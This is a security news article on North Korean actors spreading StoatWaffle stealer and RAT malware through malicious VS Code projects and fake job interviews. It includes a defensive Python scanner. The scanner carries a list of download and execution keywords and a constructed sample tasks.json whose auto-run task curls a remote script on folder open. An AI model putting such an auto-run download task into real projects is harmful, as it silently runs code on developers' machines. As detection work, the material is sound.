North Korean Hackers Deploy StoatWaffle Malware Through Malicious VS Code Projects
The North Korean threat actors behind the Contagious Interview campaign, also known as WaterPlum, have been linked to a malware family called StoatWaffle, which is being distributed through malicious Microsoft Visual Studio Code (VS Code) projects.
Researchers say the attackers are using VS Code’s tasks.json feature in a relatively new way. Since December 2025, the group has been abusing the "runOn: folderOpen" option to automatically execute malicious tasks whenever a victim opens any file inside the infected project folder in VS Code.
According to NTT Security, the task is designed to download data from a web application hosted on Vercel, regardless of the operating system. Although the initial analysis focused on Windows, the core behavior is said to be similar across all platforms.
How the Malware Works
Once triggered, the downloaded payload first checks whether Node.js is installed on the victim’s machine. If it is not present, the malware downloads Node.js from the official website and installs it.
After that, it launches a downloader that repeatedly contacts an external server to fetch a second-stage downloader. This next-stage component behaves in a similar way, communicating with another endpoint on the same server and running the received response as Node.js code.
Researchers found that StoatWaffle can deploy two primary modules:
1. Stealer Module
The stealer is designed to collect:
- Credentials stored in Chromium-based browsers
- Data from Mozilla Firefox
- Browser extension data
- The iCloud Keychain database on macOS systems
This stolen information is then uploaded to a command-and-control server.
2. RAT Module
The second module functions as a remote access trojan (RAT). It communicates with the command-and-control server and can execute a range of commands on the infected machine. These include:
- Changing the current working directory
- Listing files and directories
- Executing Node.js code
- Uploading files
- Searching directories recursively
- Finding files containing specific keywords
- Running shell commands
- Terminating itself
Researchers described StoatWaffle as a modular malware family built with Node.js, with both stealer and RAT capabilities. They also noted that WaterPlum continues to actively refine and update its toolset.
Broader Campaigns Targeting Developers
The emergence of StoatWaffle comes alongside several other campaigns attributed to the same threat actor, many of which target the open-source ecosystem.
One campaign involved a set of malicious npm packages distributing PylangGhost, marking the first known case of that malware being spread through npm.
Another operation, called PolinRider, reportedly inserted obfuscated JavaScript payloads into hundreds of public GitHub repositories. This eventually led to the deployment of a newer version of BeaverTail, a known stealer and downloader associated with the Contagious Interview campaign.
Among the affected repositories were four belonging to the Neutralinojs GitHub organization. According to reports, the attackers compromised the GitHub account of a long-time contributor who had organization-level write access. They then force-pushed malicious JavaScript code that pulled encrypted payloads hidden in Tron, Aptos, and Binance Smart Chain transactions, ultimately downloading and running BeaverTail.
Researchers believe victims in this case may have been infected through either a malicious VS Code extension or an npm package.
Fake Job Interviews as the Entry Point
Microsoft recently said that the Contagious Interview campaign gains initial access by creating highly convincing fake recruitment processes that closely resemble legitimate technical interviews.
Victims are persuaded to run malicious commands or install harmful packages hosted on platforms such as GitHub, GitLab, and Bitbucket as part of coding assessments. In some cases, targets are first approached through LinkedIn.
The attackers are not primarily targeting junior developers. Instead, researchers say they are selecting founders, CTOs, senior engineers, and professionals in the cryptocurrency and Web3 sectors, as these individuals are more likely to have privileged access to technical systems and cryptocurrency wallets.
One recent case involved an unsuccessful attempt to target the founder of AllSecure.io through a fake job interview.
Other Malware Families in the Same Attack Chain
Researchers say several malware families have been observed across these attack chains, including:
- OtterCookie, a backdoor capable of large-scale data theft
- InvisibleFerret, a Python-based backdoor
- FlexibleFerret, a modular backdoor available in both Go and Python variants
InvisibleFerret has traditionally been delivered through BeaverTail, but more recent intrusions show it being deployed later in the chain after initial access is gained through OtterCookie.
FlexibleFerret is also known as WeaselStore, while its Go and Python variants are referred to as GolangGhost and PylangGhost.
Shift From Vercel to GitHub Gist
In a sign that the attackers are adjusting their methods, newer malicious VS Code projects have reportedly moved away from Vercel-hosted domains and now use GitHub Gist-hosted scripts to download and run follow-on payloads. These newer attacks ultimately lead to the deployment of FlexibleFerret and are also being staged on GitHub.
Microsoft warned that by embedding malware directly into coding exercises and interview tools, threat actors are exploiting the trust developers place in technical hiring workflows, especially during periods of urgency and pressure.
Microsoft Introduces New Protections in VS Code
In response to the abuse of VS Code Tasks, Microsoft introduced a mitigation in the January 2026 update (version 1.109). The update added a new setting called "task.allowAutomaticTasks", which is set to "off" by default to help prevent unintended execution of tasks defined in tasks.json when opening a workspace.
Microsoft also made sure this setting cannot be overridden at the workspace level through a repository’s own .vscode/settings.json file.
According to Abstract Security, the February 2026 update (version 1.110) added another safeguard by showing users a second warning prompt whenever an auto-run task is detected in a newly opened workspace. This acts as an extra layer of defense even after a user accepts the Workspace Trust prompt.
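For teams whose developers are not yet on VS Code 1.109 or later, the tasks.json abuse described earlier and the new task.allowAutomaticTasks setting both suggest a simple repository check. The following Python scanner is an added example written for this article; it is not code from NTT Security, Abstract Security, Microsoft or the researchers cited. It reads a project's .vscode/tasks.json (VS Code's JSONC dialect, so comments and trailing commas are tolerated), flags any task with "runOptions.runOn": "folderOpen", rates it higher when the command line carries a download or script-execution marker, and separately flags a .vscode/settings.json that tries to set task.allowAutomaticTasks at the workspace level, which the article says VS Code now ignores. The keyword list, the JSONC stripper and the two sample files are my own constructions and assumptions; only the two VS Code key names come from the article.

```python
import json
from typing import Dict, List

# Key names taken from the article: the auto-run trigger abused in tasks.json and
# the user-level setting added in VS Code 1.109 (default "off").
AUTO_RUN_VALUE = "folderOpen"
AUTO_TASK_SETTING = "task.allowAutomaticTasks"

# Heuristic download/execution markers (my assumption, not an indicator list from the article).
SUSPICIOUS_TOKENS = ("curl", "wget", "invoke-webrequest", "iwr ", "powershell",
                     "node -e", "bash -c", "http://", "https://")


def _skip_ws_and_comments(text: str, i: int) -> int:
    """Advance past whitespace and // or /* */ comments; only called outside string literals."""
    n = len(text)
    while i < n:
        if text[i] in " \t\r\n":
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            break
    return i


def strip_jsonc(text: str) -> str:
    """Turn VS Code JSONC (comments, trailing commas) into strict JSON.
    A small state machine so that '//' inside a URL string is left untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escape pairs intact
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif c == ",":
            j = _skip_ws_and_comments(text, i + 1)
            if j < n and text[j] in "}]":        # trailing comma before a closer: drop it
                i += 1
            else:
                out.append(c)
                i += 1
        elif text.startswith(("//", "/*"), i):
            i = _skip_ws_and_comments(text, i)
        else:
            out.append(c)
            i += 1
    return "".join(out)


def find_auto_run_tasks(tasks_json: str) -> List[Dict]:
    """Report every task that runs on folderOpen; 'high' if the command line carries a
    download/execution marker, 'medium' otherwise (any auto-run task deserves review)."""
    data = json.loads(strip_jsonc(tasks_json))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != AUTO_RUN_VALUE:
            continue
        # Flatten command + args, including per-OS overrides, into one searchable string.
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        for os_key in ("windows", "linux", "osx"):
            override = task.get(os_key) or {}
            parts.append(str(override.get("command", "")))
            parts += [str(a) for a in override.get("args", [])]
        cmdline = " ".join(p for p in parts if p)
        hits = [t for t in SUSPICIOUS_TOKENS if t in cmdline.lower()]
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmdline,
                         "suspicious_tokens": hits, "severity": "high" if hits else "medium"})
    return findings


def workspace_tries_to_override(settings_json: str) -> bool:
    """True if a repo's .vscode/settings.json tries to set task.allowAutomaticTasks.
    VS Code ignores it there since 1.109; a repo that tries anyway is worth a look (my heuristic)."""
    return AUTO_TASK_SETTING in json.loads(strip_jsonc(settings_json))


# Constructed sample files (not real artifacts): a benign build task beside an auto-run
# task that fetches and drops a script, and a settings.json attempting the override.
SAMPLE_TASKS_JSON = r'''{
  // JSONC: comments and trailing commas are legal here
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "setup-env", "type": "shell", "command": "curl",
      "args": ["-s", "https://example.invalid/setup", "-o", "setup.js"],
      "runOptions": { "runOn": "folderOpen" } }
  ]
}'''
SAMPLE_SETTINGS_JSON = '{ "task.allowAutomaticTasks": "on" }'

if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"[{f['severity']}] auto-run task {f['label']!r}: {f['command']} hits={f['suspicious_tokens']}")
    print("workspace override attempt:", workspace_tries_to_override(SAMPLE_SETTINGS_JSON))
```

Run against the constructed sample, the scanner reports the "setup-env" task as high severity (auto-run plus curl and a remote URL) and flags the settings.json override attempt. In practice a pre-clone or CI hook would feed it the real .vscode files of any repository handed to a developer as part of a coding assessment, and a medium finding still warrants a human look, since the article notes later variants fetch their payload from GitHub Gist rather than Vercel, so a keyword list alone will not keep up.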
Ongoing North Korean Cyber Campaigns
In recent months, North Korean threat actors have also been linked to a coordinated malware campaign targeting cryptocurrency professionals through LinkedIn social engineering, fake venture capital firms, and fraudulent video conferencing links.
Researchers say this activity overlaps with clusters known as GhostCall and UNC1069. According to MacPaw’s Moonlock Lab, one of these attack chains ends in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their terminal.
The campaign is reportedly designed to work across both macOS and Windows, delivering tailored payloads depending on the victim’s operating system.
U.S. Department of Justice Announces Sentencing
The findings come as the U.S. Department of Justice announced the sentencing of three men — Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis — for helping advance North Korea’s fraudulent IT worker scheme in violation of international sanctions.
All three had previously pleaded guilty in November 2025.
Phagnasay and Salazar were each sentenced to three years of probation and fined $2,000. They were also ordered to forfeit the illegal proceeds they earned through the wire fraud conspiracy.
Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount allegedly earned by North Koreans through the use of his identity.
Margaret Heap, U.S. Attorney for the Southern District of Georgia, said the men had effectively given North Korean technology workers the access they needed to generate illicit revenue for the North Korean government in exchange for what appeared to be easy money.
Conclusion
The discovery of StoatWaffle highlights how North Korean threat actors are continuing to evolve their tactics, especially by targeting developers through trusted platforms and workflows like VS Code, GitHub, and fake job interviews.
By combining social engineering with modular malware and open-source supply chain abuse, these groups are creating increasingly sophisticated campaigns aimed at individuals with elevated access to sensitive corporate systems and digital assets.